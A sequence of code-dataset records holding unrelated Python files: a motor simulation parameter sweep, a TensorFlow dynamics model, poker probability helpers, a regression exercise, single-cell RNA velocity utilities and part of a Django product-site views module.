%%\n","sub_path":"Training_Workspace/Class101.py","file_name":"Class101.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"512830348","text":"#design space definition\n## alpha export\nx0=1.0\ndx=0.2\nN=6\nalpha=[None]*N\nalpha[0]=x0\nfor i in range(N-1):\n\talpha[i+1]=round(alpha[i]+dx,2)\n\n## beta export\nx0=0.1\ndx=0.1\nN=3\nbeta=[None]*N\nbeta[0]=x0\nfor i in range(N-1):\n\tbeta[i+1]=round(beta[i]+dx,2)\n\n## dgap\nx0=3.0\t#init\ndx=1\t#diff\nN=4\t\t#length\nd_gap=[None]*N \t#initialize size\nd_gap[0]=x0\t\t#first value\nfor i in range(N-1):\t\n\td_gap[i+1]=round(d_gap[i]+dx,2)\t\n\t\n## rmot\nr_mot=[10,15,20]\n# r_mot=[20]\n\n#info about the motor and its revision and blahblah\nrev='1'\nmot='slotted'\ndir='mot_'+mot+'/' ##create this folder manually\t\n\t\t\nj=8\t\n## 6 JT\nfor l in range(0,len(r_mot)):\n\t##size of the airgap... we have to transform it afterwards\n\tif r_mot[l]==10:\n\t\td_st=8\n\t\tw_slot=7\n\t\tl_0=7\n\telif r_mot[l]==15:\n\t\td_st=13\n\t\tw_slot=12\n\t\tl_0=9\n\telif r_mot[l]==20:\n\t\td_st=18\n\t\tw_slot=16\n\t\tl_0=11\n\n\tdx=1\t#diff\n\tN=4\t\t#length\n\tl_slot=[None]*N \t#initialize size\n\tl_slot[0]=l_0\t\t#first value\n\tfor z in range(N-1):\n\t\tl_slot[z+1]=round(l_slot[z]+dx,1)\t\t\n\n\tselectCurrentStep(activeScenario=Scenario['2_DALPHA_R'+str(r_mot[l])],\n\t\t\t\tparameterValue=['ALPHA_H='+str(alpha[0]),\n\t\t\t\t\t\t\t\t'BETA='+str(beta[0]),\n\t\t\t\t\t\t\t\t'DALPHA_MULT=1',\n\t\t\t\t\t\t\t\t# 'DTHETA=90',\n\t\t\t\t\t\t\t\t'L_SLOT='+str(l_0),\n\t\t\t\t\t\t\t\t'R_ROT_OUT='+str(r_mot[0]),\n\t\t\t\t\t\t\t\t'D_ST='+str(d_st),\n\t\t\t\t\t\t\t\t'W_SLOT='+str(w_slot)])\n\t\t\t\t\t\t\t\t# 'JF_RMS='+str(cat[m])])\t\n\t\t\t\t\t\t\t\t# 'JT_RMS='+str(j)])\t\n\t\t\t\t\t\t\t \n\tCSVExportTable(parameter=[VariationParameter['R_ROT_OUT'],\n\t\t\t\t\t\t\t VariationParameter['TX_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TX_ST'],\n\t\t\t\t\t\t\t VariationParameter['TY_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TY_ST'],\n\t\t\t\t\t\t\t VariationParameter['TZ_ROT'],\n\t\t\t\t\t\t\t VariationParameter['TZ_ST']],\n\t\t\t\t\tevolutivePath=EvolutivePath(parameterSet=[SetParameterXVariable(paramEvol=VariationParameter['ALPHA_H'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=alpha[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMax=alpha[-1]),\n\t\t\t\t\tSetParameterXVariable(paramEvol=VariationParameter['BETA'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=beta[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMax=beta[-1]),\n\t\t\t\t\tSetParameterXVariable(paramEvol=VariationParameter['L_SLOT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMin=l_slot[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t limitMax=l_slot[-1]),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['R_ROT_OUT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=r_mot[l]),\t\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['DALPHA_MULT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=1),\n\t\t\t\t\t# SetParameterFixed(paramEvol=VariationParameter['DTHETA'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # currentValue=90),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['W_SLOT'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=w_slot),\n\t\t\t\t\tSetParameterFixed(paramEvol=VariationParameter['D_ST'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t currentValue=d_st)]),\n\t\t\t\t\tfilename=dir+mot+'_2_DALPHA_rev'+rev+'_R_'+str(r_mot[l]))\t\t ","sub_path":"0_flux_to_xls/6_journal_out/slotted_separated_scenarios/20190531_2_dalpha_slotted.py","file_name":"20190531_2_dalpha_slotted.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"340318295","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n# from policy_value_network.liner_sample import Sample\n# from env.plane.liner_env import Planes_Env\nsave_model_dir = \"./current_best_dynamic_fit_plane_model\"\n'''用一个不怎么随机的方法去采样,肯定效果不好'''\n'''如果说完全不随机,不需要策略网络当前就是一个纯策略'''\nclass Dynamic_Net():\n def __init__(self,env, lr=0.0001, model_file=None):\n self.n_features = env.observation_dim # 输入特征维度\n self.learning_rate = lr # 学习率\n self.loss_alpha = 0.95 # 过去的loss占比\n self.batch = 100 # 批大小\n self.iter = 2000 # 迭代总次数\n self.n_actions = env.action_dim # 动作空间维度,特别现在是连续动作\n # 1.1 输入层 构建输入层 (由于是静态图,所以有placeholder)\n self.obs_action = tf.placeholder(tf.float32, shape=[None, self.n_features+self.n_actions])\n # 1.2.第一层隐含层100个神经元,激活函数为relu\n self.f1 = tf.layers.dense(inputs=self.obs_action, units=200, activation=tf.nn.relu,\n kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1), \\\n bias_initializer=tf.constant_initializer(0.1))\n # 1.3 第二层隐含层100个神经元,激活函数为relu\n self.f2 = tf.layers.dense(inputs=self.f1, units=100, activation=tf.nn.relu,\n kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),\\\n bias_initializer=tf.constant_initializer(0.1))\n # 1.4 输出层3个神经元,没有激活函数 怎么感觉这个玩意并不是所谓的学习PDE呢\n self.predict = tf.layers.dense(inputs=self.f2, units= self.n_features)\n # 2. 构建损失函数\n self.delta = tf.placeholder(tf.float32,[None, self.n_features]) #说白了tf给出一个一种计算的流程或者说计算的方法\n self.loss = tf.reduce_mean(tf.square(self.predict-self.delta))\n # 3. 定义一个优化器\n self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n # 4. tf工程\n self.sess = tf.Session() # 图构建完毕之后就可以创建tf工程\n # 5. 初始化图中的变量,类似于C++中的实例化\n self.sess.run(tf.global_variables_initializer())\n # 6.定义保存和恢复模型\n self.saver = tf.train.Saver()\n # 迭代训练\n if model_file is not None:\n self.restore_model(model_file)\n # 拟合动力学方程,采样获得正确标签拟合动力学模型\n def fit_dynamic(self,batch_obs_act,batch_delta,save_dir = None,epoch =10):\n flag = 0\n train_obs_act = batch_obs_act\n train_delta = batch_delta\n N = train_delta.shape[0]\n train_indicies = np.arange(N) # 获得时序标签\n loss_line=[]\n num = 0\n ls = 0\n #训练神经网络\n for i in range(self.iter):\n np.random.shuffle(train_indicies)\n for j in range(int(math.ceil(N/self.batch))):\n start_idx = j * self.batch%N\n idx = train_indicies[start_idx:start_idx+self.batch] # 获取一批数据的索引\n # 喂数据训练\n self.sess.run([self.train_op], feed_dict={self.obs_action:train_obs_act[idx,:], self.delta:train_delta[idx,:]})\n loss = self.sess.run([self.loss],feed_dict={self.obs_action:train_obs_act[idx,:], self.delta:train_delta[idx,:]})\n loss_line.append(loss)\n # print(loss[0]) # 这个主要是为了把数据提取出来\n if num == 0:\n ls=loss[0]\n else:\n ls = self.loss_alpha*ls+(1-self.loss_alpha)*loss[0]\n num+=1\n if i > epoch:\n flag=1\n break\n print(\"第%d次实验,误差为%f\" % (i, ls))\n if flag == 1:\n break\n if save_dir is not None:\n self.save_model(save_dir)\n number_line=np.arange(len(loss_line)) # 获得训练次数的标签\n plt.plot(number_line, loss_line)\n plt.show()\n def prediction(self,s_a, target_state = None,if_debug = False):\n #正则化数据\n norm_s_a = s_a\n #利用神经网络进行预测\n delta = self.sess.run(self.predict, feed_dict={self.obs_action:norm_s_a})\n predict_out = delta + s_a[:,0:self.n_features]\n '''Debug'''\n if if_debug and target_state is not None:\n x = np.arange(len(predict_out))\n plt.figure(1)\n plt.plot(x, predict_out[:,0],label=\"predict\")\n plt.plot(x, target_state[:,0],'--',label=\"real\")\n plt.legend(loc=\"best\")\n # plt.savefig(\"./alpha.png\")\n plt.figure(2)\n plt.plot(x, predict_out[:, 1], label=\"predict\")\n plt.plot(x, target_state[:, 1], '--', label=\"real\")\n plt.legend(loc=\"best\")\n # plt.savefig(\"./theta.png\")\n plt.figure(3)\n plt.plot(x, predict_out[:, 2], label=\"predict\")\n plt.plot(x, target_state[:, 2], '--', label=\"real\")\n plt.legend(loc=\"best\")\n # plt.savefig(\"./q.png\")\n plt.show()\n return predict_out\n # 定义存储模型函数\n def save_model(self, model_path):\n self.saver.save(self.sess, model_path)\n # 定义恢复模型函数\n def restore_model(self, model_path):\n self.saver.restore(self.sess, model_path)\n# '''DEBUG'''\n# env = Planes_Env()\n# sampler = Sample(env)\n# dynamic_fit_network = Dynamic_Net(env,sampler)\n# sigma = [1,0.5,0.1]\n# mu = [1.5,2.5,0.5]\n#\n# '''训练集 这里需要完成一个多次训练拼接的任务'''\n# # train_x = None # 相当于训练集是空的\n# # train_y = None\n# # real_y = None\n# # if_experince_empty = True# 经验池是否为空\n# # for i in range(100):\n# # K = np.random.normal(mu,sigma)\n# # x,y,r_y = sampler.sample_episodes_with_PID(K,1)\n# # # 第一次采样直接赋值\n# # if if_experince_empty:\n# # train_x = x\n# # train_y = y\n# # real_y = r_y\n# # if_experince_empty = False\n# # else:\n# # train_x = np.vstack((train_x,x))\n# # train_y = np.vstack((train_y,y))\n# # real_y = np.vstack((real_y,r_y))\n# # print(train_x.shape,train_y.shape,real_y.shape)\n# # dynamic_fit_network.fit_dynamic(train_x,train_y,save_model_dir)\n# '''测试集'''\n# K = np.random.normal(mu,sigma)\n# train_x , train_y , real_y = sampler.sample_episodes_with_PID(K,1)\n# dynamic_fit_network.prediction(train_x,real_y,True)\n\n\n","sub_path":"Eassy/NIPS/part1 dynamic_fit/dynamic_network/liner_plane_brain.py","file_name":"liner_plane_brain.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226279497","text":"import random\n\nHeads = set([\"A\",\"K\",\"Q\",\"J\",\"T\",\"9\",\"8\",\"7\",\"6\",\"5\",\"4\",\"3\",\"2\"])\nColors = set([\"s\",\"c\",\"h\",\"d\"])\nCards = {a+b for a in Heads for b in Colors}\nk=100000\nk_vilain = 4\n\nc_hero = [\"As\",\"Kc\"]\n\n#These function are used to assess the probability that a vilain draw one card\n#in a given range\ndef tirage(Cards,k_vilain,c_hero):\n #the function remove the cards already known and draw cards for people if \n #they are in a range\n #Cards is the set of all possible cards\n #k_vilain : number of other players\n #c_hero : cards of the hero \n Cards_copy = set(Cards)\n vilain_cards=[]\n for elmt in c_hero:\n Cards_copy.remove(elmt)\n\n for i in range(k_vilain):\n c = random.sample(Cards_copy, 2)\n vilain_cards.append(c)\n for elmt in c: \n Cards_copy.remove(elmt)\n return vilain_cards\n\ndef is_in_range(card_r,vilain_cards):\n #card_r : the range we give to vilain\n #vilain_cards : list of the cards drawn by the vilain\n S=0\n combo = [a[0][0]+a[1][0] for a in vilain_cards]\n for elmt in card_r:\n if elmt in combo:\n S=1\n return S\n\ndef proba_card_vilain(Cards,k_vilain,card_r,c_hero,k):\n #return the probability that a vilain has a given hand from a range\n #we can assess for instance, in a 6-ring table, what is the probability\n #that at least one vilain in the table have a pocket pair\n \n #Cards : pack of cards in a standard game\n #k_vilain : number of other players in the table\n #c_hero : cards dealt to hero\n #k : number of iterations\n #card_r : range of cards in format [\"AK\",\"QQ\",etc..]\n P=0\n for i in range(k):\n a=tirage(Cards,k_vilain,c_hero)\n P+=is_in_range(card_r,a)\n return P/k\n\n#dictonary that associate a hand head with a value\nhand_strength = {\"2\":2,\"3\":3,\"4\":4,\"5\":5,\"6\":6,\"7\":7,\"8\":8,\"9\":9,\"T\":10,\"J\":11,\"Q\":12,\"K\":13,\"A\":14}\n#dictionary that store the different combinaisons of a made hand \nsame_dict = {2:[],3:[],4:[],\"s\":[],\"f\":[],'sf':[]}\n\n\ndef draw_in_range(Cards,c_range):\n #we draw two cards from a given range and remove them from the package\n #Cards : remaining card in our pack\n #c_range : range of cards for the draw\n \n #We create a subsample \"l\" based on vilain range\n l=sub_sample(Cards,c_range)\n #We draw a random hand from the subsamble\n c_draw=random.sample(l, 1)\n for c in c_draw[0]:\n Cards.remove(c)\n return tuple(c_draw)\n\ndef sub_sample(Cards,c_range):\n #c_range : range of cards\n #creation of the sample of all hands in a range stored in a list\n c_range=range_arrange(c_range)\n l1=[(u[0]+c,u[1]+c) for u in c_range for c in Colors if u[2]==\"s\" if u[0]+c in Cards if u[1]+c in Cards ]\n l2=[(u[0]+c,u[1]+d) for u in c_range for c in Colors for d in Colors if c != d if u[2]==\"o\" if u[0]+c in Cards if u[1]+d in Cards ]\n return l1+l2\n\ndef range_arrange(c_range):\n #We add \"o\" to pairs if not precisedlen(l) to make it easier to read by other\n #functions\n return [l+\"o\" if len(l)==2 else l for l in c_range]\n\ndef PF_draws(Cards,h_range,*vilain_range):\n #We draw PF cards from the range given to hero and several vilains\n #return a tuble with the hands of the vilains and the hand of the hero\n h_hand=draw_in_range(Cards,h_range)\n h_vilain = ()\n for r in vilain_range:\n h_vilain += draw_in_range(Cards,r)\n h_vilain += h_hand\n return h_vilain\n\ndef B_draw(Cards,i):\n #We draw a certain number of cards for the board\n c_draw=random.sample(Cards, i)\n for c in c_draw:\n Cards.remove(c)\n return c_draw\n\ndef sim(Cards,board,h_range,*v_range):\n #simulate a hand from distribution to river\n #board : tuple of cards already in the board\n #return a dictionnary with the hands from players and hands from board\n for c in board:\n Cards.remove(c)\n p_cards=PF_draws(Cards,h_range,*v_range)\n# print(p_cards)\n b_cards = board + B_draw(Cards,5-len(board))\n# print(tuple(b_cards))\n for c in board:\n if c in Cards:\n Cards.remove(c)\n h_dict = {\"board\": tuple(b_cards)}\n i=1\n for p in p_cards:\n h_dict[f\"player {i}\"]=p\n i+=1\n return h_dict\n\ndef h_made(h_dict):\n h_dict_copy = dict(h_dict)\n board = h_dict_copy.pop(\"board\",0)\n player_hand = {key: h_val(item+board) for key,item in h_dict_copy.items()}\n return player_hand\n\ndef h_val(hand):\n same_dict = {\"c\":[],2:[],3:[],4:[],\"s\":[],\"f\":[],\"sf\":[]}\n f=flush(hand)\n sf=straight_flush(hand)\n if f:\n same_dict['f']=f\n if sf:\n same_dict[\"sf\"]=sf\n h=tuple([hand_strength[h[0]] for h in hand])\n c=sorted(list(h),reverse=True)\n same_dict[\"c\"]=c\n if 13 in h:\n h=h+(1,)\n s=straight(h)\n if s:\n same_dict['s']=s[-1]\n t=Counter(h).items()\n for elmt in t:\n if elmt[1]==2 or elmt[1]==3 or elmt[1]==4:\n same_dict[elmt[1]].append(elmt[0])\n return same_dict\n\ndef straight(hand):\n c=set(sorted(hand))\n return [c.intersection(set(range(1+i,6+i))) for i in range(10) if len(c.intersection(set(range(1+i,6+i))))==5]\n\ndef flush(hand):\n s=[h for h in hand if 's' in h]\n d=[h for h in hand if 'd' in h]\n c=[h for h in hand if 'c' in h]\n h=[h for h in hand if 'h' in h]\n L=[s,d,c,h]\n for elmt in L:\n if len(elmt)>=5:\n return tuple(elmt)\n \ndef straight_flush(hand):\n h=flush(hand)\n if h:\n h=tuple([hand_strength[h[0]] for h in h])\n if 13 in h:\n h=h+(1,)\n return straight(h)","sub_path":"Poker project/poker_func.py","file_name":"poker_func.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404510335","text":"import numpy as nu\nimport math as mt\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nx=nu.linspace(0,1,100)\nn=nu.random.normal(0,0.3,100)\ns=b=z=y=nu.zeros(100)\nfor i in range(100):\n\tz[i]=2*mt.pi*x[i]\nfor i in range(100):\n\ty[i]=n[i]+mt.sin(z[i])\na=y\nx_train, x_test, y_train, y_test=train_test_split(x, y, test_size=0.20, train_size=0.80)\nplt.plot(x_train, y_train, 'o')\nalpha=0.05\nc = nu.array([[0,0]]).T # Initial values of c\nX = nu.c_[nu.ones(80),x_train]\nY = nu.c_[y_train]\nW=[]\nfor i in range(9):\n X_i=nu.c_[x_train].T\nfor i in range(9):\n b[i]=nu.sum(c[1] - alpha * (1/len(Y)) * nu.sum(nu.dot(X_i,(nu.dot(X,c)-Y))))\n c= nu.array([[0],[b[i]]])\n W.append(b[i])\n s[i]=s[i]+b[i]\nfor i in range(9):\n plt.plot(x, a)\n a=a+pow(x,i)*s[i]\nplt.suptitle('Linear regression by gradient descent')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()\nprint(\"Estimated Value of W:\\n\",W)\nt=nu.dot((nu.dot(X,c) - y_test).T,(nu.dot(X,c) - y_test))/(2*len(Y))\nprint(\"test_error_on_test_data =\\n\",t)","sub_path":"Assignment 1/Q_3/Question_3 _100.py","file_name":"Question_3 _100.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"78240540","text":"import os.path as op\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scvelo as scv\nimport scanpy as sc\n\ndef import_scv_loom(loom):\n print('Importing loom file...')\n adata = sc.read_loom(loom, sparse=True, X_name='spliced')\n print(\"Column attributes:\", adata.obs_keys())\n print(\"Row attributes:\", adata.var_keys())\n print('Shape: ', adata.shape)\n return adata\n\ndef preprocess(adata, min_counts = 1, min_genes = 1, plot = False, n_top_genes = None, keep_genes = None):\n adata.obs_names_make_unique()\n adata.var_names_make_unique()\n if keep_genes == None: sc.pp.filter_genes(adata, min_counts=min_counts)\n else:\n gene_subset, number_per_gene = sc.pp.filter_genes(adata, min_counts=min_counts,\n inplace = False)\n print(adata.var_names[gene_subset])\n gene_subset = np.array(list(set(adata.var_names[gene_subset]) or (set(keep_genes))))\n print(gene_subset)\n keep = []\n for i in list(adata.var_names.values):\n if i in gene_subset:\n keep.append(True)\n else: keep.append(False)\n adata = adata[:,keep]\n\n sc.pp.filter_cells(adata, min_genes=min_genes, inplace = True)\n if n_top_genes is not None: scv.pp.filter_genes_dispersion(adata, n_top_genes = n_top_genes)\n print(\"Filtered data shape:\", adata.shape)\n adata.obs['n_counts'] = np.sum(adata.X, axis=1)\n mito_genes = adata.var_names.str.startswith('MT-')\n adata.obs['percent_mito'] = np.sum(\n adata[:, mito_genes].X, axis=1) / np.sum(adata.X, axis=1)\n sc.pp.calculate_qc_metrics(adata)\n if plot == True:\n sc.pl.violin(adata, [ 'n_genes','n_counts', 'percent_mito'], jitter=0.4, multi_panel=True)\n plt.show()\n # adata.raw = adata\n return adata\n\ndef normalize(adata, log = True, plot_hvg = False, min_mean = 0.0125, max_mean = 5, min_disp = 0.8):\n print(\"Normalizing...\")\n sc.pp.normalize_per_cell(adata, copy=False)\n if log == True:\n sc.pp.log1p(adata)\n print(\"Finding highly variable genes (HVGs)... \")\n sc.pp.highly_variable_genes(adata, min_mean=min_mean, max_mean=max_mean, min_disp=min_disp, flavor='cell_ranger')\n if plot_hvg == True:\n sc.pl.highly_variable_genes(adata)\n plt.show()\n return adata\n\ndef correct_cell_cycle(adata, return_cc_genes = False):\n print(\"Correcting for cell cycle...\")\n try:\n cell_cycle_genes = [x.strip() for x in open('/Users/sarahmaddox/Quaranta_Lab/SCLC/Gene_types/cell_cycle_genes.txt')]\n except FileNotFoundError: print(\"Please change directory for cell cycle genes list.\")\n s_genes = cell_cycle_genes[:43]\n g2m_genes = cell_cycle_genes[43:]\n cell_cycle_genes = [x for x in cell_cycle_genes if x in adata.var_names]\n\n sc.tl.score_genes_cell_cycle(adata, s_genes=s_genes, g2m_genes=g2m_genes)\n\n adata_cc_genes = adata[:, cell_cycle_genes]\n adata_cc_genes = sc.pp.pca(adata_cc_genes, n_comps=10, copy=True)\n adata_cc_genes = sc.tl.pca(adata_cc_genes, n_comps=10, copy=True)\n sc.pl.pca_scatter(adata_cc_genes, color='phase')\n\n sc.pp.regress_out(adata, ['S_score', 'G2M_score'])\n # sc.pp.scale(adata) #Don't scale if using this data for cell state space\n\n adata_cc_genes = adata[:, cell_cycle_genes]\n adata_cc_genes = sc.pp.pca(adata_cc_genes, n_comps=10, copy=True)\n adata_cc_genes = sc.tl.pca(adata_cc_genes, n_comps=10, copy=True)\n sc.pl.pca_scatter(adata_cc_genes, color='phase')\n if return_cc_genes == True:\n return adata, adata_cc_genes\n\n else:\n return adata\n\ndef dim_reduce(adata, cell_line_name, n_comps = 100, n_pcs = 10, resolution = .5, tsne = False, umap = True, outdir = \"\", save = False):\n if len(list(adata.obs_names)) < n_comps:\n sc.tl.pca(adata, n_comps = len(list(adata.obs_names)))\n else:\n sc.tl.pca(adata, n_comps = n_comps)\n sc.pp.neighbors(adata, n_pcs=n_pcs)\n sc.tl.louvain(adata, resolution=resolution)\n # sc.pl.pca(adata, color = 'louvain')\n if tsne == True:\n print(\"Running tsne...\")\n sc.tl.tsne(adata, n_pcs=n_pcs)\n # sc.pl.tsne(adata, color='louvain')\n # if save == False:\n # plt.show()\n # else:\n # plt.savefig(op.join(outdir, f\"{cell_line_name}_tsne.pdf\"))\n if umap == True:\n print(\"Running UMAP...\")\n sc.tl.umap(adata)\n sc.pl.umap(adata, color = 'louvain', save = f\"{cell_line_name}.pdf\")\n return adata\n\ndef calc_velocity(adata, n_pcs = 30, n_neighbors = 30, calc_embedding = True):\n print(\"Calculating velocity...\")\n scv.pp.moments(adata, n_pcs=n_pcs, n_neighbors=n_neighbors)\n scv.tl.velocity(adata)\n scv.tl.velocity_graph(adata)\n if calc_embedding == True:\n scv.tl.velocity_embedding(adata, basis='pca')\n return adata\n\ndef plot_velocity(adata,cell_line_name, n_pcs = 30, n_neighbors = 30, plot_type = ['embedded'], basis = 'tsne', save = False, outdir = \"\"):\n\n for i in plot_type:\n if save == True:\n if i == 'stream':\n scv.pl.velocity_embedding_stream(adata, basis = basis,legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_stream.pdf\"))\n elif i == 'grid':\n scv.pl.velocity_embedding_grid(adata, basis=basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_grid.pdf\"))\n elif i == 'embedded':\n\n scv.pl.velocity_embedding(adata, basis = basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_embedded.pdf\"))\n elif i == 'graph':\n\n\n scv.pl.velocity_graph(adata, basis = basis, legend_loc= ' right margin', dpi= 200, color = 'louvain')\n if save == False:\n plt.show()\n else:\n plt.savefig(op.join(outdir, f\"{cell_line_name}_graph.pdf\"))\n else:\n if i == 'stream':\n scv.pl.velocity_embedding_stream(adata, basis = basis,legend_loc='right margin', dpi = 200, color = 'louvain')\n plt.show()\n elif i == 'grid':\n scv.pl.velocity_embedding_grid(adata, basis=basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n elif i == 'embedded':\n scv.pl.velocity_embedding(adata, basis = basis, legend_loc='right margin', dpi = 200, color = 'louvain')\n elif i == 'graph':\n scv.pl.velocity_graph(adata, basis = basis, legend_loc= ' right margin', dpi= 200, color = 'louvain')\n return adata\n\ndef plot_genes(adata, genes, cline = None, save = False, plot = 'umap', outdir = None):\n genes_keep = []\n for i in genes:\n if i in adata.var_names.values:\n genes_keep.append(i)\n if plot == 'pca':\n plt.figure()\n sc.pl.pca(adata, color=genes_keep, cmap='jet', save = f'{cline}.pdf')\n elif plot == 'umap':\n plt.figure()\n sc.pl.umap(adata, color = genes_keep, cmap = 'jet',save = f'{cline}.pdf')\n","sub_path":"velocity_tools/scVelo_tools/scvelo_utils.py","file_name":"scvelo_utils.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22819292","text":"# -*- coding: utf8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom back.models import *\nfrom django.template import Template, Context\nfrom django.template.loader import get_template\nimport json\n# Create your views here.\ndef index(requrst):\n newsobjls = News.objects.all()\n news1 = {}\n news2 = {}\n if len(newsobjls) == 0:\n pass\n elif len(newsobjls) == 1:\n picpath = ''\n try:\n newspicobj = NewsPic.objects.filter(News = newsobjls[0])[0]\n picpath = newspicobj.Picture.url\n except IndexError:\n pass\n title = newsobjls[0].Title\n shortcontent = newsobjls[0].ShortContent\n url = '/news'\n news1 = dict(Url = url, Title = title, PicPath = picpath, ShortContent = shortcontent)\n else:\n picpath = ''\n try:\n newspicobj = NewsPic.objects.filter(News = newsobjls[0])[0]\n picpath = newspicobj.Picture.url\n except IndexError:\n pass\n title = newsobjls[0].Title\n shortcontent = newsobjls[0].ShortContent\n url = '/news'\n news1 = dict(Url = url, Title = title, PicPath = picpath, ShortContent = shortcontent)\n\n picpath1 = ''\n try:\n newspicobj1 = NewsPic.objects.filter(News = newsobjls[1])[0]\n picpath1 = newspicobj1.Picture.url\n except:\n pass\n title1 = newsobjls[1].Title\n shortcontent1 = newsobjls[1].ShortContent\n url1 = '/news'\n news2 = dict(Url = url1, Title = title1, PicPath = picpath1, ShortContent = shortcontent1)\n\n classoneobjls = ClassOne.objects.all().order_by('Sequence')\n if len(classoneobjls) == 0:\n return render_to_response('gree_index.html', {'news1':news1, 'news2':news2})\n elif len(classoneobjls) == 1:\n bestproductobjls = BestProduct.objects.all()\n productls = []\n for bestproductobj in bestproductobjls:\n productname = bestproductobj.ProductName\n productpicobjls = ProductPic.objects.filter(Product = bestproductobj.Product)\n path = ''\n try:\n picobj = productpicobjls[0]\n path = picobj.Picture.url\n except IndexError:\n pass\n productls.append(dict(Title = productname, PicPath = path, classone = bestproductobj.ClassOne.ClassName, classtwo = bestproductobj.ClassTwo.ClassName))\n return render_to_response('gree_index.html', {'classonestr': classoneobjls[0].ClassName, \n 'oneclassone':classoneobjls[0], \n 'productls':productls, \n 'news1':news1, \n 'news2':news2})\n else:\n length = len(classoneobjls)\n classonestrls = []\n classonestr = ''\n if length > 4:\n i = 4\n while i > 0:\n classonestrls.append(classoneobjls[4-i].ClassName)\n i -= 1\n classonestr = ','.join(classonestrls)\n else:\n for classoneobj in classoneobjls:\n classonestrls.append(classoneobj.ClassName)\n classonestr = ','.join(classonestrls)\n\n if length > 5:\n classonels = classoneobjls[0:4]\n else:\n classonels = classoneobjls[0:length - 1]\n\n if length > 5:\n oneclassone = classoneobjls[4]\n else:\n oneclassone = classoneobjls[length - 1]\n\n productls = []\n bestproductobjls = BestProduct.objects.filter(ClassOne = classoneobjls[0])\n for bestproductobj in bestproductobjls:\n productpicobjls = ProductPic.objects.filter(Product = bestproductobj.Product)\n path = ''\n try:\n picobj = productpicobjls[0]\n path = picobj.Picture.url\n except IndexError:\n pass\n productls.append(dict(Title = bestproductobj.ProductName, PicPath = path, classone = bestproductobj.ClassOne.ClassName, classtwo = bestproductobj.ClassTwo.ClassName))\n\n return render_to_response('gree_index.html', {'classonestr': classonestr, \n 'classonels':classonels, \n 'oneclassone':oneclassone,\n 'productls':productls,\n 'news1':news1, \n 'news2':news2})\n\ndef product(requrst):\n classoneobjls = ClassOne.objects.all().order_by('Sequence')\n classls = []\n for classoneobj in classoneobjls:\n classtwols = []\n classtwoobjls = ClassTwo.objects.filter(PreClass = classoneobj).order_by('Sequence')\n for classtwoobj in classtwoobjls:\n classtwols.append(classtwoobj.ClassName)\n classls.append(dict(name = classoneobj.ClassName, classtwols = classtwols))\n\n '''productls = []\n classoneobj = ClassOne.objects.get(Sequence = 0)\n classtwoobj = ClassTwo.objects.get(PreClass = classoneobj, Sequence = 0)\n productobjls = Products.objects.filter(ClassOne = classoneobj, ClassTwo = classtwoobj).order_by('Sequence')\n for productobj in productobjls:\n productpicobj = ProductPic.objects.get(Product = productobj, Sequence = 0)\n path = '/getPic/' + productpicobj.ImageName\n productls.append(dict(classtwo = classtwoobj.ClassName, path = path, name = productobj.ProductName))'''\n\n bestls = []\n for classoneobj in classoneobjls:\n name = classoneobj.ClassName\n bestprols = []\n bestproductobjls = BestProduct.objects.filter(ClassOne = classoneobj)\n for bestproductobj in bestproductobjls:\n classtwo = bestproductobj.ClassTwo.ClassName\n pname = bestproductobj.ProductName\n productpicobjls = ProductPic.objects.filter(ClassOne = classoneobj, ClassTwo = bestproductobj.ClassTwo, Product = bestproductobj.Product).order_by('Sequence')\n path = ''\n try:\n pinobj = productpicobjls[0]\n path = pinobj.Picture.url\n except IndexError:\n 